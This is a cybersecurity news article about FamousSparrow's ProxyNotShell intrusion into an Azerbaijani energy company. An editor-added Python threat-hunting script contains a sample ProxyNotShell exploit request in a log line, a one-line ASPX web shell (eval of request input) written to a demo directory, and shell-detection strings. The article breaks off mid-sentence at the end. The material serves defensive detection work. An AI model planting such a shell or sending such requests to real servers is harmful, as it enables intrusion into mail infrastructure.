Chinese APT Exploits Critical Microsoft Exchange Vulnerability to Breach Energy Sector
Key Takeaways
- Chinese state-sponsored APT group FamousSparrow breached an Azerbaijani oil and gas company.
- The attackers exploited unpatched Microsoft Exchange vulnerabilities (ProxyNotShell: CVE-2022-41040 and CVE-2022-41082) for initial access.
- The campaign involved multiple waves of attacks, deploying Deed RAT and Terndoor backdoors with advanced evasion techniques.
- The intrusion highlights ongoing, persistent threats to critical energy infrastructure.
A sophisticated Chinese state-linked advanced persistent threat (APT) group, identified as FamousSparrow, successfully infiltrated an oil and gas company in Azerbaijan. The attackers leveraged critical, unpatched vulnerabilities within the target’s Microsoft Exchange server to establish a deep and persistent presence, deploying multiple backdoor families. This incident, detailed in a recent security report, underscores the continuous and evolving threat to global critical energy infrastructure.
The extensive intrusion unfolded over several months, from late December 2025 to late February 2026, and is considered one of the most thoroughly documented Chinese APT campaigns targeting energy assets in the South Caucasus region. For a comprehensive analysis, refer to the full report.
The attackers demonstrated remarkable persistence, returning to the compromised Exchange server three separate times. Each subsequent visit involved new malware families and adjusted tactics, indicating a deliberate and sustained espionage objective rather than a simple opportunistic exploit. This multi-wave approach suggests a high level of dedication to maintaining access despite detection and attempted remediation by defenders.
Researchers at Bitdefender, who meticulously tracked the entire operation, attributed the intrusion to FamousSparrow with moderate-to-high confidence. Their analysis noted significant tactical and technical overlaps with the Earth Estries threat cluster, further solidifying the attribution.
The timing of this attack is particularly noteworthy. Azerbaijan has become an increasingly vital gas supplier for Europe, especially following the expiration of Russia’s Ukraine transit deal in 2024 and recent disruptions in the Strait of Hormuz in early 2026, which have reduced alternative energy sources. This geopolitical context likely heightened the strategic value of the target for state-sponsored espionage.
Chinese APT Hackers Exploit Microsoft Exchange
The initial phase of the operation saw the deployment of two distinct backdoor families: Deed RAT and Terndoor. Attackers also incorporated an advanced DLL sideloading technique designed to bypass automated security analysis, a level of sophistication rarely observed in previous campaigns linked to these malware families.
This layered operation significantly expanded analysts’ understanding of FamousSparrow’s capabilities and its focus on energy sector targets.
Initial Compromise and Foothold
The intrusion began on December 25, 2025, when the Microsoft Exchange Internet Information Services (IIS) worker process (w3wp.exe) attempted to write a web shell to a publicly accessible directory on the server. This action exploited the ProxyNotShell exploit chain, which consists of two vulnerabilities: CVE-2022-41040, a server-side request forgery in the Autodiscover front end, and CVE-2022-41082, a remote code execution flaw reachable through the PowerShell back end. Chained together on an unpatched Exchange server they yield remote code execution as SYSTEM; unlike the earlier ProxyShell chain, ProxyNotShell requires the attacker to hold valid credentials for any mailbox user, so it is an authenticated attack.
In the subsequent days, the attackers deployed additional web shells, using filenames such as key.aspx, log.aspx, errorFE_.aspx, and signout_.aspx. These web shells provided a persistent and reliable command-and-control channel for issuing commands and staging further malicious payloads.
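The two observations above (the Autodiscover-to-PowerShell request pattern of the ProxyNotShell chain, and new `.aspx` files appearing under the Exchange front end) are both things a defender can hunt for in IIS logs and on disk. The script below is an example added by the editor, not code from the original report or from Bitdefender. The IIS log lines, the fake front-end directory and the web shell contents are constructed for the example; the URL pattern is the one Microsoft's original URL Rewrite mitigation for CVE-2022-41040 matched (`.*autodiscover\.json.*\@.*Powershell.*`), and the baseline file list, field order and paths are assumptions that must be adjusted to a real server's `#Fields:` header and install layout.

```python
"""Hunt for ProxyNotShell exploitation and dropped web shells.

Added example (editor's code, not the report's). Sample log lines, file
names and file contents are constructed; field layout and paths are assumed.
"""
import os
import re
import tempfile

# Assumed IIS W3C field order. Real logs declare theirs in a "#Fields:" header;
# adjust FIELDS to match. Spaces inside User-Agent are logged as '+' by IIS,
# so whitespace splitting is safe on real lines too.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# CVE-2022-41040 SSRF hop: autodiscover.json with an '@' that redirects the
# request at the PowerShell back end (CVE-2022-41082). Same shape as
# Microsoft's original URL Rewrite mitigation pattern.
PROXYNOTSHELL_RE = re.compile(r"autodiscover\.json.*@.*powershell", re.IGNORECASE)

# Web shell names reported in this intrusion; a starting point, not a full list.
KNOWN_SHELLS = {"key.aspx", "log.aspx", "errorFE_.aspx", "signout_.aspx"}

# Strings typical of one-line ASPX shells (China Chopper style) used below as
# a content heuristic; legitimate Exchange pages do not eval request input.
WEBSHELL_HINTS = (b"Request.Item", b"Request.Form", b"eval(", b"Process.Start", b"cmd.exe")

# Constructed sample log. Note cs-username is set on the exploit request:
# ProxyNotShell needs a valid mailbox account, so the attacker authenticates.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-12-25 03:14:07 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.9 Mozilla/5.0 200
2025-12-25 03:15:22 10.0.0.5 POST /autodiscover/autodiscover.json @example.org/powershell&Email=autodiscover/autodiscover.json%3f@example.org 443 CORP\\jdoe 203.0.113.9 python-requests/2.31 200
2025-12-25 03:16:01 10.0.0.5 GET /owa/auth/key.aspx - 443 - 203.0.113.9 Mozilla/5.0 200
2025-12-26 09:00:00 10.0.0.5 GET /ecp/healthcheck.htm - 443 - 10.0.0.7 Mozilla/5.0 200
"""


def parse_iis_line(line):
    """Return a dict for one W3C log record, or None for headers/odd lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def find_proxynotshell(log_text):
    """Records whose full URL matches the Autodiscover -> PowerShell pattern."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        url = rec["cs-uri-stem"] + "?" + rec["cs-uri-query"]
        if PROXYNOTSHELL_RE.search(url):
            hits.append(rec)
    return hits


def find_shell_requests(log_text):
    """Records requesting one of the web shell file names seen in this case."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        if rec["cs-uri-stem"].rsplit("/", 1)[-1] in KNOWN_SHELLS:
            hits.append(rec)
    return hits


def find_suspicious_aspx(root, baseline):
    """Relative paths of .aspx files under root that are not in the known-good
    baseline, carry a known shell name, or contain shell-like content."""
    suspicious = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                body = fh.read()
            if (rel not in baseline or name in KNOWN_SHELLS
                    or any(h in body for h in WEBSHELL_HINTS)):
                suspicious.append(rel)
    return sorted(suspicious)


# Assumed baseline: the pages that should exist under the front end.
BASELINE = {"owa/auth/logon.aspx"}


def build_demo_tree():
    """Constructed stand-in for the Exchange FrontEnd directory: one legitimate
    page plus a dropped shell using a known name and eval-style content."""
    root = tempfile.mkdtemp(prefix="exch_frontend_")
    auth_dir = os.path.join(root, "owa", "auth")
    os.makedirs(auth_dir)
    with open(os.path.join(auth_dir, "logon.aspx"), "w") as fh:
        fh.write('<%@ Page Language="C#" %> legitimate logon page')
    with open(os.path.join(auth_dir, "key.aspx"), "w") as fh:
        fh.write('<%@ Page Language="Jscript"%><%eval(Request.Item["k"],"unsafe");%>')
    return root


if __name__ == "__main__":
    for rec in find_proxynotshell(SAMPLE_LOG):
        print("ProxyNotShell request", rec["date"], rec["time"], "user", rec["cs-username"], "from", rec["c-ip"])
    for rec in find_shell_requests(SAMPLE_LOG):
        print("web shell request", rec["cs-uri-stem"], "from", rec["c-ip"])
    demo_root = build_demo_tree()
    print("suspicious .aspx:", find_suspicious_aspx(demo_root, BASELINE))
```

Two practical notes: the `cs-username` on the exploit record is the pivot for the next step of the investigation, since that account's credentials were already in the attacker's hands before the SSRF was sent; and on a live server the baseline should be generated from a clean install of the same cumulative update, because Exchange ships many legitimate `.aspx` files that a name-only check would miss or misflag.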
A sophisticated three-component malware chain was then introduced, cleverly disguised as the legitimate LogMeIn Hamachi VPN application to evade detection. The loader file,
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.